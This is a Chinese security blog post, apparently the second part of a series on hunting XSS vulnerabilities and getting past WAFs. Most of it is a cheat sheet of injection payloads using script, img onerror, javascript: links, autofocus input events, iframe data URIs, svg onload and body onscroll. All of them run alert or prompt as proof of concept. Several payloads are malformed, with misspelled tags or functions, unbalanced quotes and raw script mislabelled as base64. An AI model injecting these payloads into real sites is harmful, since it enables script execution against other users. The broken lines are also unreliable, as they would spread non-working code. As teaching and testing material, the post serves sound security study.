XSS漏洞挖掘下

XSS漏洞挖掘下

GG安全 2025-04-12 09:38

免责声明

由于传播、利用本公众号红云谈安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号红云谈安全及作者不为
承担任何责任,一旦造成后果请自行承担!本文为连载文章欢迎大家关注红云谈安全公众号!

前言

你碰到WAF是不是都绕不过去?

你是不是只会使用别人的绕过语句?

你是不是只要别人的绕过语句给拦了就束手无措了?

XSS漏洞常见标签

这些标签不用刻意去记,当需要用到的时候直接翻笔记即可,经常用到的话大脑会形成肌肉记忆,不断的去用自然会在脑海慢慢留下记忆 无过滤情况

<script>alert(1);</sciript>

图片加载错误时触发<img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")>鼠标指针移动到元素时触发<img src=1 onmouseover="alert(1)">鼠标指针移出时触发<img src=1 onmouseout="alert(1")>

<a href="http://www.qq.com">qq</a><a href=javascript:alert('1')>test</a><a href=j"avascript:a" onmouseover="alert(/xss/)">aa</a><a href="" onclick=eval(alert('xss'))>aa</a><a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

<input onfocus="alert('xss');">竞争焦点,从而触发onblur事件<input onblur=alert("xss") autofocus><input autofocus>通过autofocus属性执行本身的focus事件,这个变量是使焦点自动跳转到输入元素上,触发焦点事件,无需用户去触发<input onfocus="alert('xss');" autofocus><input value="" onclick=alert('xss') type="text"><input name="name" value="" onmouseover=prompt('xss') bad=""><input name="name" value=""><script>alert('xss')</script>按下按键时触发<input type="text" onkeydown="alert(1)">按下按键时触发<input type="text" onkeypress="alert(1)">松开按键式时触发<input type="text" onkeyup="alert(1)">

<form action=javascript:alert('xss') method="get"><form action=javasript:laert('xss')><form action=1 onmouseover=alert('xss)>

iframe

<iframe onload=alert("xss");></iframe><iframe src=javascript:alert('xss')></iframe><iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe><iframe src="data:text/html;base64,<script>alert('xss')</script>"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" onmouseover=alert('xss') /><iframe>

<svg onload=alert(1)>

<body onload="alert(1)">利用换行符以及autofocus,自动去触发onscroll事件,无需用户去触发<body onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>